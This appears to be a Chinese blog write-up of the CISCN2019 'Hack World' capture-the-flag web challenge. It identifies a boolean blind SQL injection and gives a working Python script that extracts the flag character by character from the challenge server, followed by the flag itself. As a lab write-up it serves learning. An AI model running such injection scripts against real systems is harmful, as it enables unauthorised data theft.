[CISCN2019 华北赛区 Day2 Web1]Hack World

上来直接给表和列,还有一个id的参数,随便试一试

Hello, glzjin wants a girlfriend. 输入1时

Do you want to be my girlfriend? 输入2时

Error Occured When Fetch Result. 输入其他数字则是这个

bool(false) 输入字母则是这个

提示bool,显然是布尔盲注,有表有列,直接脚本

import requests
import time
url="http://9ce07c70-e1c0-4581-ae80-8161b67daf18.node4.buuoj.cn:81/index.php"
a=""
for i in range(1,50):
    for k in range(31,128):
        p='(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(i,k)
        data={"id":p}
        u=requests.post(url=url,data=data)
        time.sleep(0.005)
        if"Hello" in u.text:
            a+=chr(k)
            print(a)
        else:
            continue
print(a)

用time.sleep来防止大量访问不接受

flag{b1e6b663-a85a-432f-a6aa-90e97c0c87f5}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值